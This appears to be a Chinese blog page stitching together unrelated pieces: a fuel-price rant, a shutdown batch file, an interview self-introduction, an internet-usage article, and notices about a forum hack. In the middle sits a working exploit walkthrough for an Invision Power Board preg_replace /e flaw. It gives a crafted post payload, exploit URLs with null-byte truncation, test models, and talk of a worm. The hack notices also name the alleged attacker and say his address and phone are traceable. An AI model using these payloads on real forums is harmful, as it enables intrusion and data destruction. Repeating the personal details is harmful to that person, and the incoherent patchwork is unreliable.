就在一个月黑风高的夜晚,当全国的老百姓都沉睡在梦乡的时候,一个蓄谋已久的行动――燃油涨价又开始了。第二天当善良的人们展开双眼,才发现我们又一次失去了最后将自己爱车的油箱加满的机会。我们国家的燃油价格已经连续涨价了N次,虽然大家都已经麻木不仁了,但是今天早上看到了来自发改委的有关负责人的言论,还是让我这个一贯心平静气的内向性格的平民布衣怒火中烧,咬断虫牙!下面,针对发改委的官方言论,借助本人微薄的一点石油知识,进行一次现场辩论。

观点一:本次提价是为缩小国内外成品油价差

  试问,那一次提价,你们不是为了缩小国内外成品油的价格差呢?这个回答太没有新意,拜托下次找一个更好更新颖更有创意的好点子来懵一懵我们好了。我知道国外的汽油价格贼高,我们国内却一直享受着低油价,但是你应该早点告诉我国内外价格差距到底有多大才是呀?什么?4月17日原油期货收盘价格突破每桶70美元大关,你怎么老是了=那期货的数据来说事呀,这当中的炒作成分太大了,还有,你直接告诉我一公升多少银子就是了,老是用桶这样一个单位来计量,虽然也算是国际接轨,但是我不懂呀,是木桶,水桶还是horse桶?现在价格到了70美元,所以你们就涨价了,前一段时间,价格跌落60美元以下,你们怎么没有降价呢?“缩小国内外成品油价差,促进国民经济平稳健康发展,国家再次提高了成品油价格”。涨价可以促进稳定,切,这个道理有点新颖,那么降价肯定会破坏稳定了,那我们国家还到处去开采石油,去跨国寻找石油做什么?直接涨价到20元的单价,这样和谐社会肯定提前建立起来了。

  观点二:开采企业部分超额利润将上缴中央财政

  首先看到这两组数字,我就开始发蒙,一是:2005年中石油、中石化分别实现净利润1334亿元和396亿元,比上年增长28.4%和23%。二是2005年,上述两个公司用于这部分的资金投入分别达1248亿元和466亿元。中石油看来还厚道一点,因为它去年将净利润的93.6%拿出来进行投资,中石化的就太慷慨了,不但把自己全年的净利润全部投出,而且还倒贴了70亿元,那每一个中石化的员工岂不是要把过去下发的奖金退回给企业?今年315日国务院才开始决定开征石油特别收益金,在原油价格上涨到每桶40美元以上时,将原油开采企业获得的一部分超额利润收缴中央财政。以前的利润呢?对于这些纳税人的血汗钱,能否每年进行一次财务公告,将每一笔超过万元的资金使用情况向全国人民通报,这个每一个纳税人都应该知晓的权利。

  观点三:涨价是否与石油巨头垄断相关

  对于上述观点,这个负责人没有给出直接答案,但是分析言论的含义,显然是无关的成分居多。我所知道我们国家有很多地下炼油厂,他们通过二次炼油,生产出的燃油价格品质与目前国有企业销售的货色基本相当,而售价不足3元的单价。这中间的原因我不想深究,但是现在国内几乎所有的加油站都成为了清一色的字号,即便如此,他们彼此之间还有巨大差异,比如加盟店虽然打出了国字旗号,但是在燃油吃紧的时候却得不到厂家的供应。更有趣的是很多地方都出现了连续没有燃油可以提供的现象,我们的石油巨头却拼命解说说不可能出现油荒。其实这当中的勾当很清楚,就是囤油待到涨价再来销售,这就是垄断行业的作法,这样的企业怎么能否配上“国有”的旗号?

  观点四:成品油这类商品不在听证目录

  对于听证一词,我们早就麻木了,因为目前中国所有的听证会,一定涨价会,从来没有哪一个听证会的结果是让商品的价格降下来的。所以听证会就是相关政府部们对老百姓进行再度剥削的最好挡箭牌而已。公共交通、邮政、电信,城市供水、供电、供热、燃气等价格与收费都可以列为听证项目,而油价上涨却不再听证的范围,真是一个很有道理的事情,对于关键事务,百姓可以无知情权!因为既然大家都知道听证会就是涨价会,那么如果率先得知要进行燃油涨价的听证,那作为普通老百姓来说,肯定会拼命搜集全家所有能够盛装液体且避免挥发的所有容器,在最短的时间内将汽油加满加足,最大限度的抵御油价上涨带来的冲击。我们没有囤油的仓库,也没有购买指标神通广大的本领,只有这么一点点小小的要求,难道都不能满足么?

  观点五:国内外消费者油价承担如何比较

  终于有了比较的数据:目前英国汽油零售价为每升0.898英镑,折合人民币为每升12.8元;法国汽油零售价为每升1.214欧元,折合人民币为每升12元,均比我国汽油平均零售价高两倍左右。美国各种税收在零售价格中所占比重为20%左右,普通汽油价格为每升6.11元,比国内汽油平均价格高35%左右。看看吧,我们国家的老百姓原来很幸福了,怎么这样的幸福我们一点都没有感觉出来呢?因为呀,英国、法国和美国的人均年收入都超过了2万美元甚至更多多,我们呢?2千美元都木有!我们用别人1/10的收入,享受着高出别人35%的汽油,我们容易么?政府制定政策,为什么以为向比我们发达数十年的国家进行比较,为什么不和产油的俄罗斯比较一下,人家月收入700元人民币教授依然可以开着20年的拉达潇洒地走着,我们呢?还有那些过路费、过桥费、养路费等等,既是选择一款用水作为燃料地汽车进行全国旅游,也会被这些苛捐杂税折腾倒调,你们搞发展改革的人士们,怎么不考虑一下这些?

  观点六:国内油价为何要与国际接轨

  什么都要接轨了,不过轨道不太一样。别人是时速500公里以上的磁悬浮轨道,我们是时速不足50公里的米轨!油价是否一定要和国际接轨?这似乎是一个颠扑不破的真理。但是我要说:一是既然2005年我们石油净进口为1.36亿吨,占石油全部消费量的42.9%。那么我们接轨的部分应该是这里的42.9%,我们还有57.1%的大部分是我们能够自己解决的,自己的东西,难道也要采取国际上的高价钱?人家那些拉美产油国家的石油比自来水还便宜,因为人家能够自给,我们为什么连自己的部分也要接轨呢?二是我们燃油的品质接轨了么?一位用我们国家的高硫汽油和国际上的超级无铅汽油进行比较,东施也要和西施竞聘选美?简直要笑S我了!我们国家的燃油品质差是不争的事实,否则你们中石化、中石油还拼命往里面搁置什么添加剂做什么?国外汽车公司总是用落后的发动机来装配国产的新车,他们最充足的理由就是燃油品质太差!你们拿出这样的石油,却卖出了国际接轨的价格,真是够黑的了,现在还在这里堂而皇之地大放厥词,真是“哇呀呀,看斧头!”

自从家里用了液晶电视后,PC就装了MCE连液晶观看电影,几个月下来,更新了一些补丁,安装的程序也多了,关机居然关不了,重新装系统吧,也挺烦的,今天写了个批处理,效果还不错,结合MCE遥控器,又可以躺在床上关机了。

方法:

在桌面新建poweroff.bat,内容如下:

tskill explorer                           //杀死explorer进程,可以写成tskill [PID],但是explorer每次开机PID都不一样,因此干脆用进程名explorer

shutdown -s -f -t 00               //不给提示立即强行关机,-s是关闭本地计算机,-f是强行关闭正在使用的其他程序 -t是在几秒内关机,我这写着00是立马关机之意!

这不是透明的裙子,而是裙子上所印的花样。现在正在日本流行, 马上流行到美国了!先让您有个心理准备,不要到时在街上惊得心脏病发作!




. 自我介绍(self-introduce)
Good morning. I am glad to be here for this interview. First let me introduce
myself. My name is ***, 24. I come from ******,the capital of *******Province. I graduated from the ******* department of *****University in July ,2001.In the past two years I have been prepareing for the postgraduate examination while I have been teaching *****in NO.****middle School and I was a head-teacher of a class in junior grade two.Now all my hard work has got a result since I have a chance to be interview by you .
I am open-minded ,quick in thought and very fond of history.In my spare time,I have broad interests like many other youngers.I like reading books, especially those about *******.Frequently I exchange with other people by making comments in the forum on line.In addition ,during my college years,I was once a Net-bar technician.So, I have a comparative good command of network application.I am able to operate the computer well.I am skillful in searching for information in Internet.I am a football fan for years.Italian team is my favorite.Anyway,I feel great pity for our country’s team.
I always believe that one will easily lag behind unless he keeps on learning .Of course, if I am given a chance to study ****** in this famous University,I will stare no effort to master a good command of advance ******.

#############
##简单分析###
#############
该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php  行1258-1262:

    if ( $this->ipsclass->input[‘lastdate’] )
        {
            $this->output = preg_replace( "#(value=[\"’]{$this->ipsclass->input[‘lastdate’]}[\"’])#i", "\\1

selected=’selected’", $this->output );
            
        }
    }

通过变量input[‘lastdate’]注入/e, $this->output注入shellcode。

#############
##利用方法###
#############

注册一个用户,发个贴 内容[shellcode]如下:[

superheixxxxxxxeval(phpinf0()); //

注意最后的;和//之间有一空格

然后点“Search”—>Search by Keywords:superheixxxxxxxeval [记得选择Show results as posts ]

可以得到searchid
http://127.0.0.1/ipb215/upload/index.php?act=Search&CODE=show&searchid=81a5a928d500c4653647e5b249ab5f53&search_in=posts&resul

t_type=posts&highlite=superheixxxxxxxeval

然后在后面加一个&lastdate=z|eval.*?%20//)%23e%00 也就是[/e]提交就ok了:

http://127.0.0.1/ipb215/upload/index.php?act=Search&CODE=show&searchid=81a5a928d500c4653647e5b249ab5f53&search_in=posts&resul

t_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?%20//)%23e%00

#############
##分析讨论###
#############
1.

简单分析:

该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php  行1258-1262:

    if ( $this->ipsclass->input[‘lastdate’] )

        {

            $this->output = preg_replace( "#(value=[\"’]{$this->ipsclass->input[‘lastdate’]}[\"’])#i", "\\1

selected=’selected’", $this->output );

            

        }

    }

通过变量input[‘lastdate’]注入/e, $this->output注入shellcode。

这个分析,掉了一个重要的细节:preg_replace+/e 里有3个参数,只有第2个参数里的代码才可以执行,但是上面的语句貌似是第3个参数提交

的,其实不然,注意上面preg_replace里的第2个参数:\\1 selected=’selected’ 里面的\\1 为第一参数里正则表达试匹配后的值。归根结底

我们提交的shellcode还是在第2个参数执行了。

2.

注意最后的;和//之间有一空格

这个又是为什么呢?因为我们提交的lastdate=z|eval.*?%20//)%23e%00里是已空格+//为标志的,所以我们提交的shellcode也要有空格+//

3.preg_replace存在null截断漏洞????

我想这个应该算是php本身一个的漏洞[同以前include的null截断漏洞],我们测试下,把上面的漏洞写个简单的模型:
<?
$a=$_GET[a];
echo preg_replace("#(value=[\"’]z|eval.*?//)#e{$a}[\"’])#i ","\\1 ","heigegegxxxxxxxeval(phpinfo());//");
?>

我们直接提交http://127.0.0.1/test2.php?a=2出现错误:
Warning: Unknown modifier ‘2’ in d:\easyphp\www\test2.php on line 3

提交http://127.0.0.1/test2.php?a=%002 则执行phpinfo(). 我们成功截断了。模型代码执行环境要求gpc=off ,但是在很多的web程序里是

经过变量编码和解码在执行的,所以不受gpc的影响,上面的ipb的就可以在gpc=on的情况下截断。

4."lastdate=z|eval.*?%20//)%23e%00"的构造
主要是在this->output里以eval和%20//为标志取\\1 为执行的php代码。

5.worm的利用?
还记得Santy吗?就是利用的phpbb里的一个preg_replace,这里会会被利用呢?ipb这个漏洞的利用必须要登陆,但是在ipb注册时候有“图片

认证”,不过据说这个可以编写程序读出来?? 只要突破这个worm是有可能的,毕竟ipb的用户有那么多……

#############
##总结模型###
#############
1.直接在preg_replace第2个变量执行的模式:
<?
echo preg_replace("/test/e",$h,"jutst test");
?>
提交http://127.0.0.1/test/11/preg.php?h=phpinfo()
实例如:phpbb的viewtopic.php变量$highliht_match提交php代码执行漏洞

2.通过\\1[或者\\n]提取第3个变量里的php代码并执行的模式:
<?
echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $h);
?>
提交:http://127.0.0.1/test/11/preg.php?h=[php]phpinfo()[/php]

“昨天让一伙强盗把偶们后花园的南墙给推塌了,和八国联军差不多吧。导致好多园丁的辛勤劳作的成果也被顺手洗劫一空。当然了,偶们当家的早有防范,没让来犯之敌完全得逞,只是昨天园丁的辛苦白费了,还有一些工具被毁掉了,相信我们的当家的会很快解决掉这些问题。请大家安心浏览,等修好工具大家再干活。
让我们用非常鄙视的语气唾骂这些狗娘养的畜牲。但凡与我们家花园为敌的也是我们共同的敌人。
我们会拿起法律的武器与狗娘养的抗争到底!谁敢在咱们头上撒野,一定要有被反击心理准备!有仇不报非君子,大丈夫是有仇必报,并且是马上就报!”—————-verycd总版主吕不韦!

论坛被黑事件的详细说明
“关于昨天论坛被黑的事件。
基本已经调查清楚,攻击者有我们的会员帐号,账号名是cidea,网名againow,姓名:李港平。

攻击的方法大致是利用了IPB的Bug(详细),修改了论坛首页,并且删除了所有数据库内容。

该Bug目前已修复,数据库也已经恢复到了昨天凌晨备份的版本。

我们讨论了一下该如何处置李港平同学,本来发现网站漏洞是一件好事,可以帮助我们弥补漏洞。可惜李港平同学选择了一种错误的方式来处理此事——删除了我们数据库中的所有内容,造成我们的论坛中断数个小时,并丢失了14号1天的数据。甚至选择了错误的时间——14号晚上,本应该陪在母亲身边的。

出来混,迟早要还的,在互联网上留下的痕迹永远不可能被彻底抹去。就像我们可以轻易查出李港平的名字、住址、电话、学校…… 他应该庆幸,没有给我们造成毁灭性的破坏,否则,相关的责任和后果对他来说,恐怕也是毁灭性的……

互联网是真实世界的一部分,每个人都需要为自己的行为负责,希望大家都能够自重!”———–verycd Dash!

对攻击VeryCD事件的检讨
“5.14 母亲节.
我做出了令人气愤的事情,攻击了VeryCD并drop了整个数据库.
我自己也不能理解自己的行为,平时我不是这样的人.这几天我情绪有点不稳定.(这不是我为我的行为而找借口.)
我为我的行为而感到可耻.在此向广大论坛成员道歉.

PS:本来我不想道歉的,因为这已经成为事实,但是VC的宽容让我在此无地自容.
谢谢你们对我的宽容.

再次为我的不理智而道歉.”———攻击者

昨天论坛被黑全程实况转播!

当一个中国网民打开电脑开始聊天的时候,一个美国网民可能正在查找到他的一个商业伙伴办公地的行车路线,而一个法国网民可能正在自己的博客上“奋笔疾书”。调查表明,聊天是中国网民上网最爱干的事情之一。而美国人上网最常做的事是查地图,法国的博客人数则在不久前超过了600万,这就是说平均大约10个法国人中就有1个有了自己的博客。不同的上网习惯不仅反映出一个国家互联网的发展水平,也反映出了一个国家的网络质量、网民的素质和网络文化。

  国外网民普及率很高

  美国是名副其实的网络大国,从购物到旅行、从投资到理财,样样离不开互联网。网络彻底改变了美国人的生活。电脑在美国家庭相当普及,家家都有一两台台式机或笔记本电脑,所有的机场、旅馆、图书馆都有无线上网设备或有线上网端口,很多美国人出差都习惯性地带上笔记本电脑,大有“将上网进行到底”的架势。正是因为电脑十分普及,上网十分方便,美国的网吧并不多见。据“皮尤网络与美国生活项目”的调查,美国现有成年网民1.47亿,占成年人总数的73%。有87%的网民上网最常做的事情是查地图,与朋友或家人交流的有79%,查天气占到69%,看新闻的为63%,查体育比赛结果的是55%,买票的为55%,查地址、邮编或电话号码等的人有50%,玩游戏的有46%。据统计,约2100万美国人通过上网找工作,1700万人上网选择学校,1600万人上网买车或投资理财,约1000万人上网找住房。一些受访者表示,在他们所做的重大决定中,至少有1/8是靠互联网帮忙定夺的。

  根据德国电视一台和德国电视二台做的调查显示,德国网民大多数为14岁以上,上网时经常从事的活动中,80%的比例是查看电子邮件,59%是获取信息、从事商业活动,比如买书、CD,预定机票、酒店等。在德国大约63%的男性都上网,而女性网民只占女性总数的48%。男性上网喜欢浏览新闻,女性喜欢浏览关于旅行、健康、文化和成人教育方面的信息。在使用网上银行服务方面,男性比女性多。据德国经济研究所调查,估计到2007年德国的网络用户可以达到4800万人,占人口的59%。

  网络带来无限商机

  法国人上网很注重“实用性”。除了查找信息等最基本需求外,法国人在网上做得比较多的是进行电子商务等经济活动以及一些与生活息息相关的事情。比如,很多女士都喜欢上网购物,即使是老年人也如此,因为网上的卖价普遍比商店要便宜;男士上网多是搜集软件,或者买电脑配件、书籍等。二手货交易在法国很流行,很多人都把自己用不着的东西拿到网上交易。此外,法国许多小店铺或小商家对互联网的使用意识很强,记者家附近有家面包店就建立了自己的网站来推销商品,顾客可以从网上订购生日蛋糕等。不少法国人出游都依靠网络订机票、船票或者火车票。

  在日本,网络创造了很多商业机会。在日本的雅虎和乐天等网站上商家云集,网上购物十分盛行,人们不出门就能在网上订购各种各样的商品,衣食住行几乎无所不包。网上商店成本较低,商品相对便宜,这对那些没有时间上街购物的人来说是绝好的选择。日本的网络上还形成了一个庞大的人才供需市场,用人企业以及求职者可以在网上交流,各取所需。很多人利用网络进行证券交易。一些专业主妇在照顾家庭的同时,利用网络在家中炒股。为了节约成本,有些企业开始尝试让员工在家中上班,员工可在家中借助网络随时与企业保持联系。

  博客成为网络新热点

  据法国《世界报》报道,世界目前有5000至7000万博客,法国一直遥遥领先于其他欧洲国家。今年5月,法国博客人数已超过600万,约占总人口的1/10。据2005年年底统计,法国乃至欧洲最大的博客网“蓝天博客”共设有350多万个博客,其中54%的博客为女性所建,内容多是心灵独白文章。《世界报》分析,这种趋势仍将快速扩大,而且不仅限于个人用户。今年3月底,《费加罗报》发行人玛蒂厄·科松在接受记者专访时指出,他们报纸的网络版也将尝试“记者博客”这类新东西,一来可以增加报纸的个性,二来提高读者的参与性。

  法国很多政界人士对博客也钟爱有加,甚至将其作为自己与民众沟通的有利工具。法国总统的热门候选人、内政部长萨尔科奇就特别喜欢通过博客网来了解民意。法国社会党的美女政治家罗雅尔也是总统的热门候选人,她也有自己的博客,人们每天都能看到关于她的各类信息和照片。

  一种新型的网络交流方式SNS自2004年以来在日本迅速流传开来。SNS兼具博客的功能,但与博客相比更强调小团体和个人的空间。它可以在一定范围内集结对某个问题感兴趣的人展开讨论,因此广受年轻人的欢迎。Mixi是眼下日本网民比较关注的一个网站,“mix”代表交流,“i”代表人。它的运作方式完全采取邀请式,通过友人发邀请才能加入其中。由于加入自己的小团体的人多是认识的,所以在网上交流有更多的亲近感。个人网页分为“我的圈子”和“个性团体”等几个部分。自己的圈子中的成员多是朋友,也有通过朋友的介绍而成为网友的,有的则是在网上投石问路,因志同道合而加入对方的圈子。这种方便小团体交流的网站并不全是免费的,也有一小部分是收费的,收费的网站可以有条件通过广告从商家得到广告费。

  在Mixi网站上,与中国话题有关的小团体不少,向往中国者大有人在,他们一起谈论中国食品和自然风光等。记者通过朋友介绍加入了Mixi,认识了几位叫“喜欢中国”、“热爱中国”等的网友。一些网友颇有绅士风度,在评论记者的网络日志前,先发来一封信:“我可以在您的日记后写几句话吗?”在得到许可后方发表评论。日本人平时很难向他人敞开心扉,在网上的小范围交流就可以少一些顾忌,所以SNS的交流方式很受日本人欢迎。有趣的是,日本网民的头像多是动物图片或卡通形象,真实的形象却深藏不露。

  中国互联网建设仍面临许多问题

  中国互联网络信息中心信息服务部主任王恩海告诉本报记者,总的来说,中国网民的群体特征是:男性、未婚、30岁以下、学历在本科以下、月收入在2000元及以下(含无收入)。尽管中国网民绝对数较大,但在人口中的比例仍很小,仅为8.5%,甚至落后于越南。老年人上网在中国来说比较少见,而在美国则相当普遍。

  王恩海指出,中国目前的互联网应用,特别是提高人民生活水平的应用还不够。发达国家对先进互联网技术的研究和投入很大,这使得它们在互联网接入、应用、安全、信用等方面比较领先,这也是促进发达国家民众上网的主要因素。不过,10年前,美国网民的数量还占到全球网民的2/3,现在只有大约1/4,说明其他国家在网络使用方面正在快速地赶上美国。越来越多的中国企业加大了在信息技术的投入,个体消费者网上购物也越来越普遍。根据赛迪顾问公司的统计,中国电子商务交易继2004年73.
7%的高速增长之后,2005年电子商务逐渐步入稳定增长期,比2004年增长了41.7%,而美国去年较前年的增长为24.5%。可以说,中国互联网的发展后劲是很足的。

  国家 网民人数

  美国 1.52亿

  中国 7200万

  日本 5200万

  德国 3200万

  英国 3000万

  韩国 2460万

  法国 2390万

  加拿大 1900万

  意大利 1680万

  印度 1670万

  巴西 1320万

  西班牙 1250万

  荷兰 1100万

  俄罗斯 1080万

  澳大利亚970万

  部分国家网民人数表,数据来源于comScore Networks公司今年5月初公布的报告。该报告排除了15岁以下网民,也没有计算通过网吧上网者。